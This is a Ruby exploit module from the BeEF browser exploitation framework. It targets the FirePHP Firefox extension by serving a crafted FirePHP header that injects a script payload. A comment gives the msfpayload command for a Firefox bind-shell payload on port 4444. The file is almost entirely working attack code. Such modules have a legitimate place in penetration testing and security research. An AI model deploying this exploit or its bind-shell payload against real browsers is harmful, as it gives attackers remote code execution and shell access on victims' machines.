#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
###
# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
###
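class Firephp_code_exec < BeEF::Core::Command
  # Pre-send hook: builds the Wildfire/FirePHP-formatted HTTP response and
  # mounts it on the BeEF asset handler at /firephp. The JavaScript served is
  # read verbatim from payload.js next to this module; nothing is generated
  # here, so the module only does what that file contains.
  #
  # @return [void]
  def pre_send
    # random token used both as a value inside the JSON structure and as the
    # HTTP body of the mounted response
    rand_str = rand(32**10).to_s(32)

    # load payload.js file
    # generate payload:
    # msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
    #
    # File.read replaces the former open / each_line / close sequence: the
    # handle is closed even if reading raises, and the result is the same
    # concatenation of every line of the file.
    payload = File.read("#{$root_dir}/modules/exploits/firephp/payload.js")

    # construct exploit+payload HTTP response
    exploit = {
      "RequestHeaders" => {
        "1" => "#{rand(10)}",
        "2" => "#{rand(10)}",
        "3" => "#{rand(10)}",
        "4" => "#{rand(10)}",
        "5" => "#{rand(10)}",
        "6" => "#{rand(10)}",
        "7" => "#{rand(10)}",
        "8" => "#{rand(10)}",
        "9" => "#{rand(10)}",
        "<script>#{payload}<\/SCRIPT>" => rand_str
      }
    }.to_json

    # mount exploit+payload at /firephp
    # @todo use Router class instead of bind_raw()
    #
    # The X-Wf-1-1-1-1 value is "<length>|<json>|". String#length counts
    # characters, so the prefix only equals the byte length while payload.js
    # is pure ASCII.
    # NOTE(review): the trailing -1 argument's meaning is not visible here —
    # confirm against AssetHandler#bind_raw.
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw(
      '200',
      {
        'Content-Type' => 'text/html',
        'X-Wf-Protocol-1' => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
        'X-Wf-1-Plugin-1' => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
        'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
        'X-Wf-1-1-1-1' => "#{exploit.length}|#{exploit}|\r\n"
      },
      rand_str,   # HTTP body
      '/firephp', # URI mount point
      -1
    )
  end

  # Post-execute hook: persists the 'result' entry of the command datastore
  # through the framework's save helper.
  #
  # @return [void]
  def post_execute
    save('result' => @datastore['result'])
  end
end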